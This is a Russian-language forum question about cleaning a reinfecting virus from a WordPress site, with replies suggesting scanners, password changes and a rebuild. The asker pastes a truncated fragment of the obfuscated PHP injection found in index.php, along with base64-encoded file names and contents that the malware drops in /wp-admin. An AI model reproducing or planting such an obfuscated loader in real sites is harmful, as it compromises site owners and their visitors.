bogdan_uman
@bogdan_uman
шлЫмазл неукЪ-поцЪ

WP как удалить вирус?

Здравствуйте. Подскажите пожалуйста. Заметил вирус в папке с WP, прошелся поудалял все подозрительные файлы, поисправлял некоторые измененные файлы, обновил все плагины. Но вирус так до конца вычистить не удалось, периодически изменяет файл корне WP

index.php
<?php
$O_O0_0O_O0='9001';
$OO_O00O_0_='wp-admin';
$O_O0OO_00_=("5-x0o8k7gr3tpqsd9al2zvefwijy61hcmbnu4_");$O_00_0OO_O=$O_O0OO_00_{14}.$O_O0OO_00_{11}.$O_O0OO_00_{9}.$O_O0OO_00_{22}.$O_O0OO_00_{17}.$O_O0OO_00_{32}.$O_O0OO_00_{37}.$O_O0OO_00_{14}.$O_O0OO_00_{4}.$O_O0OO_00_{31}.$O_O0OO_00_{6}.$O_O0OO_00_{22}.$O_O0OO_00_{11}.$O_O0OO_00_{37}.$O_O0OO_00_{31}.$O_O0OO_00_{18}.$O_O0OO_00_{25}.$O_O0OO_00_{22}.$O_O0OO_00_{34}.$O_O0OO_00_{11};$O0O_O0O_0_=$O_O0OO_00_{14}.$O_O0OO_00_{11}.$O_O0OO_00_{9}.$O_O0OO_00_{22}.$O_O0OO_00_{17}.$O_O0OO_00_{32}.$O_O0OO_00_{37}.$O_O0OO_00_{8}.$O_O0OO_00_{22}....



Полный скрипт index.php

и в папке /wp-admin, регулярно создаются файлики

d3d3LnJld2VicmUuY29t.txt
cmVhbGl0eXdlYnN0dWRpby5jb20=.txt
OTQuMTMwLjE1MS4yMTE=.txt
d3d3LmVrb2FwdGVrYS5jb20=.txt
cHJpbnRlci0zZC5jb20udWE=.txt
ZWtvYXB0ZWthLmNvbQ==.txt


с содержимым

Lmdvb2RzdGFydC5yZWQ=|OTAwMC5iZXN0eXNjb21wdXRlcm1hbGwudG9w


Может подскажете как удалить этот вирусняк? Спасибо.
  • Вопрос задан
  • 1617 просмотров
Решения вопроса 2
@DeniSidorenko
Было такое, удалив лишь этот код он будет появляться снова и снова. Надо удалить сам вирус. Для этого есть пару вариантов и лучше попробовать все
1) Сканирование на вирусов через антивирус хостинга( если такой имеется, может стоить небольшую доп плату)
2) Установить плагин для проверки сайта на вирусы Antivirus
Вот статья как грамотно все сделать
Как удалить вирус
Ответ написан
@FlipWho
Бэкапа нет совсем никакого?
Первым делом - смени пароли админов и на FTP.
Сайт на хостинге один? Если не один - еще WP есть? Если есть - он тоже завирусован?

В зависимости от назначения сайта я пользуюсь разными методами лечения.
Если визитка - просто выгружаю в XML, глазами ищу вредоноса в XML. Ставлю новый WP, накатываю шаблон, который предварительно тоже глазами каждый файл прохожу. Как вариант - шаблон из бэкапа (он обычно в визитке меняется не часто), XML из свежей выгрузки и всё это на новый WP.
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы